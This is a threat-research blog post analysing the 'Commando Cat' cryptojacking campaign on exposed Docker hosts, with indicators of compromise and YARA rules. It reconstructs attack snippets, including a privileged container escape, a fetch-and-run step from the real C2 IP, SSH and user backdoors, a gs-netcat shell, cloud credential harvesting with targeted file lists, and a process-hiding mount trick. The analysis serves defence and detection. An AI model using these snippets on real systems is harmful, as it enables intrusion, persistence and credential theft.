January 2, 2024

The Nine Lives of Commando Cat: Analyzing a Novel Malware Campaign Targeting Docker

"Commando Cat" is a novel cryptojacking campaign exploiting exposed Docker API endpoints. This campaign demonstrates the continued determination attackers have to exploit the service and achieve a variety of objectives.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Nate Bill
Threat Researcher

Summary

  • Commando Cat is a novel cryptojacking campaign exploiting Docker for Initial Access
  • The campaign deploys a benign container generated using the Commando Project [1]
  • The attacker escapes this container and runs multiple payloads on the Docker host
  • The campaign deploys a credential stealer payload, targeting Cloud Service Provider credentials (AWS, GCP, Azure)
  • The other payloads exhibit a variety of sophisticated techniques, including an interesting process hiding technique (as discussed below) and a Docker Registry blackhole

Introduction: Commando Cat

Cado Security Labs (now part of Darktrace) encountered a novel malware campaign, dubbed “Commando Cat”, targeting exposed Docker API endpoints. This is the second campaign targeting Docker since the beginning of 2024, the first being the malicious deployment of the 9hits traffic exchange application, reported only a matter of weeks prior [2].

Attacks on Docker are relatively common, particularly in cloud environments. This campaign demonstrates the continued determination attackers have to exploit the service and achieve a variety of objectives. Commando Cat is a cryptojacking campaign leveraging Docker as an initial access vector and (ab)using the service to mount the host’s filesystem, before running a series of interdependent payloads directly on the host. 

As described in the coming sections, these payloads are responsible for registering persistence, enabling a backdoor, exfiltrating various Cloud Service Provider credential files and executing the miner itself. Of particular interest are a number of evasion techniques exhibited by the malware, including an unusual process hiding mechanism. 

Initial access

The payloads are delivered to exposed Docker API instances over the Internet from the IP 45[.]9.148.193 (which is also the C2 server). The attacker instructs Docker to pull down a Docker image called cmd.cat/chattr. The cmd.cat (also known as Commando) project “generates Docker images on-demand with all the commands you need and simply point them by name in the docker run command” [1].

The attacker likely uses it to appear as a benign tool and avoid arousing suspicion.

The attacker then creates the container with a custom command to execute:

Figure 1: Container with custom command to execute

This initial command uses chroot to escape from the container onto the host operating system, then checks whether the following services are active on the system:

  • sys-kernel-debugger
  • gsc
  • c3pool_miner
  • dockercache

The gsc, c3pool_miner, and dockercache services are all created by the attacker after infection. The purpose of the check for sys-kernel-debugger is unclear: this service is not used anywhere in the malware, nor is it part of Linux. It is possible that the service is part of another campaign that the attacker does not want to compete with.
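
For illustration, the container creation and service check likely resembled the following. This is a hedged sketch: the -v /:/host --privileged mount and chroot pattern mirrors the docker run command preserved verbatim in the IoC YARA strings at the end of this post, while the loop paraphrases the command shown in Figure 1.

docker run -t -v /:/host --privileged cmd.cat/chattr \
  chroot /host sh -c '
    # bail out if the host already carries attacker-created services
    for svc in sys-kernel-debugger gsc c3pool_miner dockercache; do
      systemctl is-active --quiet "$svc" && exit 1
    done'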

Once these checks pass, it runs the container again with another command, this time to infect it:

Figure 2: Container with infect command

This script first chroots to the host, then tries to copy any binaries named wls or cls to wget and curl respectively. Cryptojacking campaigns commonly rename these binaries to evade detection; the attacker is likely anticipating that this box was previously infected by a campaign that renamed the binaries, and is undoing that. The attacker then uses either wget or curl to pull down the user.sh payload.
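
A minimal sketch of that logic, assuming the payload is fetched straight off the C2 (the URL path and binary locations are illustrative assumptions):

C2='http://45.9.148.193'   # the delivery/C2 IP from the IoCs; the URL path below is assumed
chroot /host sh -c "
  # undo a prior campaign's binary renaming, if present
  [ -f /usr/bin/wls ] && cp /usr/bin/wls /usr/bin/wget
  [ -f /usr/bin/cls ] && cp /usr/bin/cls /usr/bin/curl
  # fetch and run the payload with whichever downloader is available
  (curl -Lk $C2/user.sh || wget -q -O - $C2/user.sh) | sh"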

This is repeated with the sh parameter changed to the following other scripts:

  • tshd
  • gsc
  • aws

In addition, another payload is delivered directly as a base64 encoded script instead of being pulled down from the C2; this is discussed in a later section.

user.sh

The primary purpose of the user.sh payload is to create a backdoor in the system by adding an SSH key to the root account, as well as adding a user with an attacker-known password.

On startup, the script changes the permissions and attributes on various system files such as passwd, shadow, and sudoers in order to allow for the creation of the backdoor user:

Figure 3

It then calls a function called make_ssh_backdoor, which inserts attacker-controlled RSA and ED25519 SSH keys into the root user’s authorized_keys file:

Figure 4: The make_ssh_backdoor function

It then updates a number of SSH config options to ensure root login is permitted, along with enabling public key and password authentication. It also sets the AuthorizedKeysFile option to a variable named “$hidden_authorized_keys”; however, this variable is never actually defined in the script, which breaks public key authentication.
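
A sketch of those changes, including the bug (the sed invocations are illustrative; the option names are standard sshd_config directives):

sed -i 's/^#\?PermitRootLogin.*/PermitRootLogin yes/' /etc/ssh/sshd_config
sed -i 's/^#\?PubkeyAuthentication.*/PubkeyAuthentication yes/' /etc/ssh/sshd_config
sed -i 's/^#\?PasswordAuthentication.*/PasswordAuthentication yes/' /etc/ssh/sshd_config
# $hidden_authorized_keys is never defined anywhere in the script, so this
# expands to an empty path and breaks public key authentication:
echo "AuthorizedKeysFile $hidden_authorized_keys" >> /etc/ssh/sshd_config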

Once the SSH backdoor has been installed, the script then calls make_hidden_door. This function creates a new user called “games” by adding an entry for it directly into /etc/passwd and /etc/shadow, as well as giving it sudo permission in /etc/sudoers.

The “games” user has its home directory set to /usr/games, likely in an attempt to appear legitimate. Continuing this theme, the attacker has also opted to set the login shell for the “games” user to /usr/bin/nologin. This is not the path of the real nologin binary; it is instead a copy of bash placed there by the malware. This makes the “games” user appear to be a regular service account while actually being a backdoor.
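
A hedged reconstruction of make_hidden_door based on the behaviour described above (the UID, password hash, and exact sudoers line are illustrative):

echo 'games:x:1001:1001::/usr/games:/usr/bin/nologin' >> /etc/passwd
echo "games:$(openssl passwd -6 'attacker-password'):19359:0:99999:7:::" >> /etc/shadow
echo 'games ALL=(ALL:ALL) ALL' >> /etc/sudoers
cp /bin/bash /usr/bin/nologin   # the fake "nologin" login shell is really bash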

Figure 5: The “games” user

With the two backdoors in place, the malware then calls home with the SSH details to an API on the C2 server. Additionally, it also restarts sshd to apply the changes it made to the configuration file, and wipes the bash history.

Figure 6: SSH details sent to the C2 API

This provides the attacker with all the information required to connect to the server via SSH at any time, using either the root account with a pubkey, or the “games” user with a password or pubkey. However, as previously mentioned, pubkey authentication is broken due to a bug in the script. Consequently, the attacker only has password access to “games” in practice.

tshd.sh

This script is responsible for deploying TinyShell (tsh), an open source Unix backdoor written in C [3]. Upon launch, the script will try to install make and gcc using either apk, apt, or yum, depending on which is available. The script then pulls a copy of the tsh source from the C2 server, compiles it, and then executes it.

Figure 7

TinyShell works by listening on the host for incoming connections (on port 2180 in this case), with security provided by a hardcoded encryption key in both the client and server binaries. As the attacker has graciously provided the code, the key could be identified as “base64st”. 

A side effect of this is that other threat actors could easily scan for this port and attempt to authenticate with the secret key, allowing anyone with the skills and resources to take over the botnet. TinyShell has been commonly used as a payload before; UNC2891, for example, made extensive use of it during attacks on Oracle Solaris based systems [4].

The script then calls out to a freely available IP logger service called yip[.]su. This allows the attacker to be notified of where the tsh binary is running, so they can then connect to the infected machine.

Figure 8

Finally, the script drops another script to /bin/hid (also referred to as hid in the script), which can be used to hide processes:

Figure 9

This script works by cloning the Linux mtab file (the list of active mounts) to another directory. It then creates a new bind mount over the /proc/<pid> directory of the process the attacker wants to hide, before restoring the mtab. The bind mount causes any queries to /proc/<pid> to show an empty directory, causing tools like ps aux to omit the process. Cloning the mtab and then restoring the older version also hides the created bind mount itself, making it harder to detect.
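
Fragments of the hid script survive verbatim in the IoC YARA strings at the end of this post (cp /etc/mtab /usr/t and mount --bind /usr/foo /proc/$1), suggesting a shape like the following sketch, with the restore step reconstructed from the description:

#!/bin/sh
# hid <pid>: hide a process by masking its /proc entry
cp /etc/mtab /usr/t              # 1. save the current mount table
mount --bind /usr/foo /proc/$1   # 2. empty dir over /proc/<pid>; ps/htop now skip it
cp /usr/t /etc/mtab              # 3. restore mtab so the bind mount itself is not listed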

The script then uses this binary to hide the tshd process.

gsc.sh

This script is responsible for deploying a backdoor called gs-netcat, a souped-up version of netcat that can punch through NAT and firewalls. Its purpose is likely to act as a backdoor in scenarios where traditional backdoors like TinyShell would not work, such as when the infected host is behind NAT.

Gs-netcat works in a somewhat interesting way: in order for nodes to find each other, they use a shared secret instead of an IP address, connecting via the Global Socket relay network (gsocket.io) [5]. This permits gs-netcat to function in virtually every environment, as it circumvents many firewalls on both the client and server end. To calculate a shared secret, the script simply uses the victim's IP and hostname:

Figure 10
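
A hypothetical sketch of the derivation and the resulting listener; the plain concatenation is an assumption based on the description, while the gs-netcat flags (-l listen, -i interactive shell, -s shared secret) are the tool's documented options:

VICIP=$(curl -s ifconfig.me)   # victim public IP; the discovery method is assumed
VICHN=$(cat /etc/hostname)     # /etc/hostname appears in the IoC YARA paths
gs-netcat -l -i -s "${VICIP}${VICHN}" &   # serve a shell, reachable via the relay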

From a security point of view this is more defensible than tsh: there are roughly four billion possible IPv4 addresses and many more possible hostnames, making brute force harder, although still possible using strategies such as lists of common hostnames and IP ranges known for hosting virtual servers, such as AWS.

The script proceeds to set up gs-netcat by pulling it from the attacker’s C2 server, selecting a specific version based on the architecture of the infected system. Notably, if tar is not available on the system or fails, the attacker uses the cmd.cat containers to untar the downloaded payload. The script also uses /dev/shm instead of /tmp; /dev/shm acts as a temporary file store but is memory-backed. This may be an evasion mechanism, as it is much more common for malware to use /tmp, and it also means the artefacts never touch the disk, making forensics somewhat more difficult. This technique has been used before by BPFdoor, a high-profile Linux campaign [6].
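
The container-based fallback is preserved verbatim in the IoC YARA strings:

docker run -t -v /:/host --privileged cmd.cat/tar tar xzf /host/dev/shm/.nc.tar.gz -C /host/bin gs-netcat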

Figure 11

Once the binary has been installed, the script creates a malicious systemd service unit to achieve persistence. This is a very common persistence method for Linux malware; however, not all systems use systemd, rendering this payload entirely ineffective on those systems. $VICCS is the shared secret discussed earlier, which is stored in a file and passed to the process.
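
A minimal sketch of such a unit (the unit body is illustrative; /bin/gs-netcat and the secret file /etc/systemd/gsc are paths listed in the IoCs):

cat > /etc/systemd/system/gsc.service <<'EOF'
[Unit]
Description=gsc

[Service]
# read the shared secret ($VICCS) back from the file dropped earlier
ExecStart=/bin/sh -c '/bin/gs-netcat -l -i -s "$(cat /etc/systemd/gsc)"'
Restart=always

[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload && systemctl enable --now gsc.service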

Figure 12

The script then uses the previously discussed hid binary to hide the gs-netcat process. It is worth noting that this will not survive a reboot, as there is no mechanism to hide the process again after it is respawned by systemd.

Figure 13

Finally, the malware sends the shared secret to the attacker via their API, much like how it does with SSH:

Figure 14

This allows the attacker to run their client instance of gs-netcat with the shared secret and gain persistent access to the infected machine.

aws.sh

The aws.sh script is a credential grabber that pulls credentials from several files on disk, as well as from IMDS and environment variables. Interestingly, the script creates a marker file the first time it runs; since the file is never removed, the script can never run again. This is potentially to avoid arousing suspicion by generating lots of calls to IMDS or the AWS API, as well as keeping the keys harvested by the attacker distinct per infected machine.
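
A sketch of that run-once guard (the marker path is illustrative; the actual filename is not shown in the script excerpts):

MARKER='/var/tmp/.aws_done'
[ -f "$MARKER" ] && exit 0   # a second run exits immediately
touch "$MARKER"              # never removed, so the grab happens exactly once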

The script overall is very similar to scripts previously attributed to TeamTNT and could have been copied from one of their campaigns [7]. However, script-based attribution is difficult, and while the similarities are visible, it is hard to attribute this script to any particular group.

Figure 15

The first thing run by the script (if an AWS environment is detected) is the AWS grabber. First, it makes several requests to IMDS to obtain information about the instance’s IAM role and its security credentials. The timeout is likely used to stop this part of the script from taking a long time to run on systems where IMDS is not available. It also appears that this script only works with IMDSv1, so it can be rendered ineffective by enforcing IMDSv2.
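
A sketch of those IMDSv1 queries, using the standard metadata endpoints (the timeout value is illustrative):

ROLE=$(curl -s --max-time 3 http://169.254.169.254/latest/meta-data/iam/security-credentials/)
CREDS=$(curl -s --max-time 3 "http://169.254.169.254/latest/meta-data/iam/security-credentials/${ROLE}")
# IMDSv2 would first require a session token (PUT /latest/api/token), which the
# script never requests - hence enforcing IMDSv2 defeats this grabber.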

Figure 16

Information of interest to the attacker, such as instance profiles, access keys, and secret keys, is then extracted from the response and placed in a global variable called CSOF, which is used throughout the script to store captured information before sending it to the API.

Next, it checks environment variables on the instance for AWS related variables, and adds them to CSOF if they are present.

Figure 17

Finally, it adds the STS caller identity returned by the AWS CLI to CSOF.

Next up is the cred_files function, which executes a search for a few common credential file names and reads their contents into CSOF if they are found. It has a few separate lists of files it will try to capture.

CRED_FILE_NAMES:

  • "authinfo2"
  • "access_tokens.db"
  • ".smbclient.conf"
  • ".smbcredentials"
  • ".samba_credentials"
  • ".pgpass"
  • "secrets"
  • ".boto"
  • ".netrc"
  • "netrc"
  • ".git-credentials"
  • "api_key"
  • "censys.cfg"
  • "ngrok.yml"
  • "filezilla.xml"
  • "recentservers.xml"
  • "queue.sqlite3"
  • "servlist.conf"
  • "accounts.xml"
  • "kubeconfig"
  • "adc.json"
  • "azure.json"
  • "clusters.conf" 
  • "docker-compose.yaml"
  • ".env"

AWS_CREDS_FILES:

  • "credentials"
  • ".s3cfg"
  • ".passwd-s3fs"
  • ".s3backer_passwd"
  • ".s3b_config"
  • "s3proxy.conf"

GCLOUD_CREDS_FILES:

  • "config_sentinel"
  • "gce"
  • ".last_survey_prompt.yaml"
  • "config_default"
  • "active_config"
  • "credentials.db"
  • "access_tokens.db"
  • ".last_update_check.json"
  • ".last_opt_in_prompt.yaml"
  • ".feature_flags_config.yaml"
  • "adc.json"
  • "resource.cache"

The files are grabbed by performing a find on the root filesystem for each name and appending the results to a temporary file, before the final concatenation of the credential files is read back into the CSOF variable.

Figure 18: The CSOF variable

Next up is get_prov_vars, which simply loops through all processes in /proc and reads their environment variables into CSOF. This is interesting, as the payload already checks environment variables in several places, such as in the aws, google, and azure grabbers. It is unclear why it grabs all of this data and then grabs specific portions of it again.
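
A minimal sketch of get_prov_vars as described (the output path style matches the /tmp/$RANDOM paths in the IoCs):

for e in /proc/[0-9]*/environ; do
  tr '\0' '\n' < "$e" 2>/dev/null   # environ entries are NUL-separated
done >> "/tmp/$RANDOM"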

Figure 19

Regardless of what data it has already grabbed, the get_google and get_azure functions are called next. These work identically to the AWS environment variable grabber: each checks for the existence of a variable and then appends its contents (or the file’s contents, if the variable is a path) to CSOF.

Figure 20

The final thing it grabs is an inspection of all running Docker containers via the get_docker function. This can contain useful information about what is running in the container and on the box in general, as well as potentially exposing more secrets that are passed to the container.
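
A sketch of get_docker as described, using standard docker CLI flags:

# inspect every running container; the output includes each container's Env
# array, mounts, and command line, any of which can leak secrets
docker ps -q | xargs -r docker inspect 2>/dev/null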

Figure 21

The script then closes out by sending all of the collected data to the attacker. The attacker has set a username and password on their API endpoint for collected data, the purpose for which is unclear. It is possible that the attacker is concerned with the endpoint being leaked and consequently being spammed with false data by internet vigilantes, so added the authentication as a mechanism allowing them to cycle access by updating the payload and API.

Figure 22

The base64 payload

As mentioned earlier, the final payload is delivered as a base64 encoded script rather than in the traditional curl-into-bash method used previously by the malware. This base64 is echoed into base64 -d, and then piped into bash. This is an extremely common evasion mechanism, with many script-based Linux threat actors using the same approach. It is interesting to note that the C2 IP used in this script is different from the other payloads.

The base64 payload serves two primary purposes: deploying an XMRig cryptominer, and “securing” the Docker install on the infected host.

When it is run, the script looks for traces of other malware campaigns. First, it removes all containers whose command matches /bin/bash -c 'apt-get or busybox, and then it removes all containers whose command does not contain chroot (the initial command used by this payload).

Figure 23

Next, it looks for any services named “c3pool_miner” or “moneroocean_miner” and stops and disables them. It then looks for associated binaries such as /root/c3pool/xmrig and /root/moneroocean/xmrig and deletes them from the filesystem. These steps are taken prior to deploying its own miner, so that it is not competing for CPU time with other threat actors.
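
That cleanup reduces to something like the following (service and binary names are taken from the description above):

for svc in c3pool_miner moneroocean_miner; do
  systemctl stop "$svc" 2>/dev/null
  systemctl disable "$svc" 2>/dev/null
done
rm -f /root/c3pool/xmrig /root/moneroocean/xmrig   # remove rival miner binaries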

Once the competing miners have been killed off, it then sets up its own miner. It does this by grabbing a config and binary from the C2 server and extracting it to /usr/sbin. This drops two files: docker-cache and docker-proxy.

The docker-proxy binary is a custom fork of XMRig, with the path to the attacker’s config file hardcoded in the binary. It is invoked by docker-cache, which acts as a stager to ensure it is running, while also having the functionality to update the binary should a file with a .upd extension be detected.

It then uses a systemd service to achieve persistence for the XMRig stager, using the name “docker cache daemon” to appear inconspicuous. It is interesting to note that the name dockercache was also used by the Cetus cryptojacking worm [8].

Figure 24

It then uses the hid script discussed previously to hide the docker-cache and docker-proxy services by creating a bind mount over their /proc entry. The effect of this is that if a system administrator were to use a tool like htop to try and see what process was using up the CPU on the server, they would not be able to see the process.

Finally, the attacker “secures” Docker. First, it pulls down alpine and tags it as docker/firstrun (the reason for this will become clear later), and then deletes any images in a hardcoded list of images commonly used in other campaigns.

Figure 25

Next, it blackholes the Docker registry by writing its hostname to /etc/hosts with an IP of 0.0.0.0.

Figure 26

This completely blocks other attackers from pulling their images and tools onto the box, eliminating the risk of competition. Keeping the Alpine image tagged as docker/firstrun allows the attacker to continue using the Docker API to spawn an Alpine container and break back in; since the image is already downloaded, the blackhole has no effect on it.
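
A sketch of the blackhole and its escape hatch (the registry hostname is an assumption; the post only states that the Docker registry is blackholed):

docker pull alpine && docker tag alpine docker/firstrun   # cache a re-entry image first
echo '0.0.0.0 registry-1.docker.io' >> /etc/hosts         # then block all future pulls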

Conclusion

This malware sample, despite being primarily scripts, is a sophisticated campaign with a large amount of redundancy and evasion that makes detection challenging. The usage of the hid process hider script is notable as it is not commonly seen, with most malware opting to deploy clunkier rootkit kernel modules. The Docker Registry blackhole is also novel, and very effective at keeping other attackers off the box.

The malware functions as a credential stealer, highly stealthy backdoor, and cryptocurrency miner all in one. This makes it versatile and able to extract as much value from infected machines as possible. The payloads seem similar to payloads deployed by other threat actors, with the AWS stealer in particular having a lot of overlap with scripts attributed to TeamTNT in the past. Even the C2 IP points to the same provider that has been used by TeamTNT in the past. It is possible that this group is one of the many copycat groups that have built on the work of TeamTNT.

Indicators of compromise (IoCs)

Hashes

user 5ea102a58899b4f446bb0a68cd132c1d

tshd 73432d368fdb1f41805eba18ebc99940

gsc 5ea102a58899b4f446bb0a68cd132c1d

aws 25c00d4b69edeef1518f892eff918c2c

base64 ec2882928712e0834a8574807473752a

IPs

45[.]9.148.193

103[.]127.43.208

YARA Rules

rule Stealer_Linux_CommandoCat { 
 meta: 
 description = "Detects CommandoCat aws.sh credential stealer script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "185564f59b6c849a847b4aa40acd9969253124f63ba772fc5e3ae9dc2a50eef0" 
 strings: 
 // Constants 
 $const1 = "CRED_FILE_NAMES" 
 $const2 = "MIXED_CREDFILES" 
 $const3 = "AWS_CREDS_FILES" 
 $const4 = "GCLOUD_CREDS_FILES" 
 $const5 = "AZURE_CREDS_FILES" 
 $const6 = "VICOIP" 
 $const7 = "VICHOST" 

 // Functions 
 $func1 = "get_docker()" 
 $func2 = "cred_files()" 
 $func3 = "get_azure()" 
 $func4 = "get_google()" 
 $func5 = "run_aws_grabber()" 
 $func6 = "get_aws_infos()" 
 $func7 = "get_aws_meta()" 
 $func8 = "get_aws_env()" 
 $func9 = "get_prov_vars()" 

 // Log Statements 
 $log1 = "no dubble" 
 $log2 = "-------- PROC VARS -----------------------------------" 
 $log3 = "-------- DOCKER CREDS -----------------------------------" 
 $log4 = "-------- CREDS FILES -----------------------------------" 
 $log5 = "-------- AZURE DATA --------------------------------------" 
 $log6 = "-------- GOOGLE DATA --------------------------------------" 
 $log7 = "AWS_ACCESS_KEY_ID : $AWS_ACCESS_KEY_ID" 
 $log8 = "AWS_SECRET_ACCESS_KEY : $AWS_SECRET_ACCESS_KEY" 
 $log9 = "AWS_EC2_METADATA_DISABLED : $AWS_EC2_METADATA_DISABLED" 
 $log10 = "AWS_ROLE_ARN : $AWS_ROLE_ARN" 
 $log11 = "AWS_WEB_IDENTITY_TOKEN_FILE: $AWS_WEB_IDENTITY_TOKEN_FILE" 

 // Paths 
 $path1 = "/root/.docker/config.json" 
 $path2 = "/home/*/.docker/config.json" 
 $path3 = "/etc/hostname" 
 $path4 = "/tmp/..a.$RANDOM" 
 $path5 = "/tmp/$RANDOM" 
 $path6 = "/tmp/$RANDOM$RANDOM" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

rule Backdoor_Linux_CommandoCat { 
 meta: 
 description = "Detects CommandoCat gsc.sh backdoor registration script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "d083af05de4a45b44f470939bb8e9ccd223e6b8bf4568d9d15edfb3182a7a712" 
 strings: 
 // Constants 
 $const1 = "SRCURL" 
 $const2 = "SETPATH" 
 $const3 = "SETNAME" 
 $const4 = "SETSERV" 
 $const5 = "VICIP" 
 $const6 = "VICHN" 
 $const7 = "GSCSTATUS" 
 $const8 = "VICSYSTEM" 
 $const9 = "GSCBINURL" 
 $const10 = "GSCATPID" 

 // Functions 
 $func1 = "hidfile()" 

 // Log Statements 
 $log1 = "run gsc ..." 

 // Paths 
 $path1 = "/dev/shm/.nc.tar.gz" 
 $path2 = "/etc/hostname" 
 $path3 = "/bin/gs-netcat" 
 $path4 = "/etc/systemd/gsc" 
 $path5 = "/bin/hid" 

 // General 
 $str1 = "mount --bind /usr/foo /proc/$1" 
 $str2 = "cp /etc/mtab /usr/t" 
 $str3 = "docker run -t -v /:/host --privileged cmd.cat/tar tar xzf /host/dev/shm/.nc.tar.gz -C /host/bin gs-netcat" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

rule Backdoor_Linux_CommandoCat_tshd { 
 meta: 
 description = "Detects CommandoCat tshd TinyShell registration script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "65c6798eedd33aa36d77432b2ba7ef45dfe760092810b4db487210b19299bdcb" 
 strings: 
 // Constants 
 $const1 = "SRCURL" 
 $const2 = "HOME" 
 $const3 = "TSHDPID" 

 // Functions 
 $func1 = "setuptools()" 
 $func2 = "hidfile()" 
 $func3 = "hidetshd()" 

 // Paths 
 $path1 = "/var/tmp" 
 $path2 = "/bin/hid" 
 $path3 = "/etc/mtab" 
 $path4 = "/dev/shm/..tshdpid" 
 $path5 = "/tmp/.tsh.tar.gz" 
 $path6 = "/usr/sbin/tshd" 
 $path7 = "/usr/foo" 
 $path8 = "./tshd" 

 // General 
 $str1 = "curl -Lk $SRCURL/bin/tsh/tsh.tar.gz -o /tmp/.tsh.tar.gz" 
 $str2 = "find /dev/shm/ -type f -size 0 -exec rm -f {} \\;" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

References:

  1. https://github.com/lukaszlach/commando
  2. https://www.darktrace.com/blog/containerised-clicks-malicious-use-of-9hits-on-vulnerable-docker-hosts
  3. https://github.com/creaktive/tsh
  4. https://cloud.google.com/blog/topics/threat-intelligence/unc2891-overview/
  5. https://www.gsocket.io/
  6. https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor
  7. https://malware.news/t/cloudy-with-a-chance-of-credentials-aws-targeting-cred-stealer-expands-to-azure-gcp/71346
  8. https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/